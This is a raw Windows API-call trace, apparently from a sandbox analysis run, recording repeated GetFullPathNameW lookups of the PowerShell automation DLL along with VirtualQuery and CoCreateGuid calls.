	[0351.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.632] VirtualQuery (in: lpAddress=0x1cb780, lpBuffer=0x1cc640, dwLength=0x30 | out: lpBuffer=0x1cc640*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.632] VirtualQuery (in: lpAddress=0x1cb810, lpBuffer=0x1cc6d0, dwLength=0x30 | out: lpBuffer=0x1cc6d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.632] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.632] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.633] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.633] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.633] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.633] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.633] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.646] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0351.646] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0351.646] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0351.646] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0351.646] VirtualQuery (in: lpAddress=0x1cbbc0, lpBuffer=0x1cca80, dwLength=0x30 | out: lpBuffer=0x1cca80*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0351.647] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0351.647] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0351.647] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0351.647] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0351.647] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x254f9f35, Data2=0x1099, Data3=0x4957, Data4=([0]=0x9f, [1]=0x40, [2]=0x8f, [3]=0x5d, [4]=0xd9, [5]=0x43, [6]=0x93, [7]=0x4c))) returned 0x0
	[0351.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.650] VirtualQuery (in: lpAddress=0x1cb780, lpBuffer=0x1cc640, dwLength=0x30 | out: lpBuffer=0x1cc640*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0351.650] VirtualQuery (in: lpAddress=0x1cb810, lpBuffer=0x1cc6d0, dwLength=0x30 | out: lpBuffer=0x1cc6d0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0351.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.651] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0351.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.651] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xecd7b49e, Data2=0x93d3, Data3=0x45d0, Data4=([0]=0x82, [1]=0xfb, [2]=0xca, [3]=0x5d, [4]=0xfb, [5]=0xa5, [6]=0x3b, [7]=0x27))) returned 0x0
	[0351.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.652] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x64fde329, Data2=0xeb1b, Data3=0x47a5, Data4=([0]=0x85, [1]=0xc4, [2]=0x38, [3]=0x84, [4]=0x7e, [5]=0xee, [6]=0x29, [7]=0x23))) returned 0x0
	[0351.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
